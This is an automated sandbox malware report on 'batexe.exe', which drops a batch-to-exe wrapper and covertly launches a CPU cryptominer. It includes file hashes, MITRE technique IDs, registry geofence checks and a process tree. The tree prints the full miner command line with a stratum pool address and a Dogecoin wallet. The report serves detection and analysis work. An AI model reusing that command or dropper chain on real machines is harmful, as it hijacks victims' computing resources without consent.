73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
301s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
12/02/2024, 06:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
3736	b2e.exe
5796	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
5796	cpuminer-sse2.exe
5796	cpuminer-sse2.exe
5796	cpuminer-sse2.exe
5796	cpuminer-sse2.exe
5796	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/5356-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 5356 wrote to memory of 3736	5356	batexe.exe	53
PID 5356 wrote to memory of 3736	5356	batexe.exe	53
PID 5356 wrote to memory of 3736	5356	batexe.exe	53
PID 3736 wrote to memory of 4436	3736	b2e.exe	76
PID 3736 wrote to memory of 4436	3736	b2e.exe	76
PID 3736 wrote to memory of 4436	3736	b2e.exe	76
PID 4436 wrote to memory of 5796	4436	cmd.exe	80
PID 4436 wrote to memory of 5796	4436	cmd.exe	80

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5356
- C:\Users\Admin\AppData\Local\Temp\66A9.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\66A9.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\66A9.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3736
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6978.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4436
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5796

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\66A9.tmp\b2e.exe

Filesize
358KB

MD5
5a105232ece8295ab349fab0a82f1b2c

SHA1
4f6b692028ce7a51409bea373c293b2df6e170a2

SHA256
0ea4319e61b19800eab030ec08bb79970e318e05eb1b087dc2131fab3a1df0d5

SHA512
a96161adf1f1a634ddd4053e2b7dba177ef6d5c787d0e510e6ae13ae2695e066156b92a4ef61fa9745098c29e7e99f976f62a0a32eeb31ff8d072bb1f36ded35

Download Submit
C:\Users\Admin\AppData\Local\Temp\66A9.tmp\b2e.exe

Filesize
164KB

MD5
3a03dc1c90aabf2b6421dc5bc13a76fa

SHA1
63daf6a84a57186c8e41a02ecdbd603d729aeecf

SHA256
1aa08e94a54bd9d4cca71379169ff769721e58aec1aff4a029641287eb191111

SHA512
56659dd1ecbe44f18c6df6cd36a4aa72899f4d65761b43d90d415dc3374dfdbee8bc5eddc8234bc52fa7622b831ac33792210fc7cbb649cb7532f460368bbf73

Download Submit
C:\Users\Admin\AppData\Local\Temp\66A9.tmp\b2e.exe

Filesize
134KB

MD5
cb5675bb6abbab597b9a797495afe119

SHA1
56f851229c0ef2fb7718b0b7307b6c43c1d23609

SHA256
57bc5e584cecf4c8f67674a77db13d9904bdcfeb981b2c8fc474cfc61ee45022

SHA512
9a1de89006e7a284527fb30dbf426595f5c629b305358aa782aaf612d4645e30568de26c70fbbd708c3a2c7de3bdbc39e212542e4a8743778e7b367ae173ab1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\6978.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
778KB

MD5
e5c334e065824a6e42f18c026871ebcf

SHA1
804b849012382a0779dfe425bf8809c5735d2203

SHA256
27d735f51eeda356604ae0b5157dabf373ba08675fecd49e55a8c28e6365ccd3

SHA512
ef26a414444e284961eff799305818cdc4685ce4d6d3cba13c659f3dc5c000fd49b8af5c7eff761c354d94254dd3690d4d36a8462aa4f6d4d9bcb53fc1fb4c4a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.0MB

MD5
2ba10cada4dacc93f89dc27a833acde3

SHA1
e38eb2c46fb3675ef0de690bf2e94f2ee9274e09

SHA256
d0f767bd244a14906d9192d728daf340fd614c35719fa40bbd32eee3c06e2e22

SHA512
4a5eaa0d4fd6267a06a547ca095023a308965d8c5776261178eb8f7fe302c7dc286a89dff03920139e36aeabd8acd58a50e9e14a6b9d8ddc3cfa6e8c2a865c2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
609KB

MD5
b8e1a8c74da67cb76a833fa119ff1be3

SHA1
0875d2af05588676d8c384f357de3e90cfa0ddc8

SHA256
77eb55979f49dbfbd6d0d59eb8e1676993bbfccc4781c47630f1a6a206bd856e

SHA512
d2763d3cebdd1c1ada51ae1b33274379b375058cb4f64998176017d81bd8ffdaa3223d83b3422c964761969fa73625e44cd01fbf001f314a9fdf39c599627e40

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
753KB

MD5
9d6daec6946db70bd92e182596d31df6

SHA1
286b0b11920e8e8aa11b530df005cee0486cac32

SHA256
ec4bbdcccef981ab6d50be07ec4ec19dfa5cbc75a6fda29e4993f757ed178ed2

SHA512
32474d69b929d98a49de43cc71eb247e35767ed733e2d5f956dc0da8a72687ac66476e1374284b9ec2455ce55480f6de8efe33c10f03300ba94101089b4f11d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
983KB

MD5
c52d4ef516760218e1b5e207e389061e

SHA1
60f8fd1b1a72719bd787789e5793b1419273588a

SHA256
a22530c898dcb3f88d2b2a3834056de4e6d266e0133740349109b2976fb03712

SHA512
68b5e6a38ea58bbb8b59fcf3a75448ee1d627ea063b55e0b58876cf897a9c8e423b9083f7827ec11a48c76a0356f840719f9825822583677d95fa4a0a9812131

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
507KB

MD5
5bf1433693a2f94d64862eb1cf12f47d

SHA1
b94ad90ea71943f227616867ce727f621c3daa38

SHA256
8969a0a675ca9eb805e5bfd1ed8ba73951dde169a12870cc66864dc39a70694a

SHA512
43cd72fb1e87b86ed124a46cc7ee04231027d248925088200746935ce3df77d4cc17cbc9bd9814e37784132415e380525d66254d34693eaae2c3e78569732114

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
535KB

MD5
e05de646911395c7a0e0d3002171d22a

SHA1
9ae6e6af9c407f6aa14e35f4fc480bd034cad4fa

SHA256
60e771633af18656c1f35a15d598462b6ff49c2806d748e0ee88e0ff7cf24f04

SHA512
aa5e54ce0a2c3d9e0c82f81bdd12c83576c9c31545e3d8f830fa7e43d1662ac1a17645e576cdb6fb1015e1f52dcb1768bb87431bb8ca8e595098f71f9b056ca0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
733KB

MD5
d4effbc1ea52123e60c033444bf69275

SHA1
d7d2d97dfaae7941dec887ce179a691619939bd8

SHA256
331a4b4977d296fda40a66837620da8764227f76962b1d74a84a52567f910082

SHA512
564ea05e51614409c4f8b3d216a5aa898c312b045b9a82159413533cbf0fe2eab6f14abcfeb7850a9ad1692ebb75fc524ab49c62765568b165a80ce8bf0c72c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
395KB

MD5
593cc060db13874a4895a8186071775e

SHA1
bbed0b12632ba4f62fcf452d3f7496a5149692c7

SHA256
26199784277179a5783e8932f914b460ad60cf8f31d9d933772c292c2701227e

SHA512
9b38abac2fdb4f268b101da7ab1f82c3fa3ecf18872efd67c17acda23c8745af0b0cd5854b84e9c399c5d4e49799297d8137a8fa4a9e124b0a33c4a61ca95a8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
443KB

MD5
0c2b4bac1e1c162616ee5a9822b1c8b4

SHA1
08251cb0587eaca484379ea3f355103f99fbc975

SHA256
5151f2285771c45fd2f81d604b96ab852620e0b5b362398e8d4ff1f6ea80ce17

SHA512
77ff5a07d7015cb61e2e47e5336f1fbaba7d4476fd18bc3e9e87795501750fd977aa7b0fa0f6acd81b56347b6d2729756d54458a0115bd067562fc358a5a2947

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
576KB

MD5
92a73bd28b3db3af85b9d5127b51d4fd

SHA1
a81ed5fa807cb0a5b63528b10c0a2950ead50862

SHA256
c7280ae799ef216a20fc855665434703b25a594a2c0909a69abab7f47c6865cb

SHA512
a86e6c4875a542e6c488f16d221a44bf315a7a35c3aaea74412b569a3f566e790c1a8d6269e6e8fe4d51cb24c6f8e8aef19c7ab16bb1d9e0ba03a1347392c29b

Download Submit
memory/3736-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3736-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5356-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/5796-47-0x00000000010E0000-0x0000000002995000-memory.dmp

Filesize
24.7MB

Download
memory/5796-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5796-46-0x0000000055450000-0x00000000554E8000-memory.dmp

Filesize
608KB

Download
memory/5796-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/5796-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5796-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5796-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5796-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/5796-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5796-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5796-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5796-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5796-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5796-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download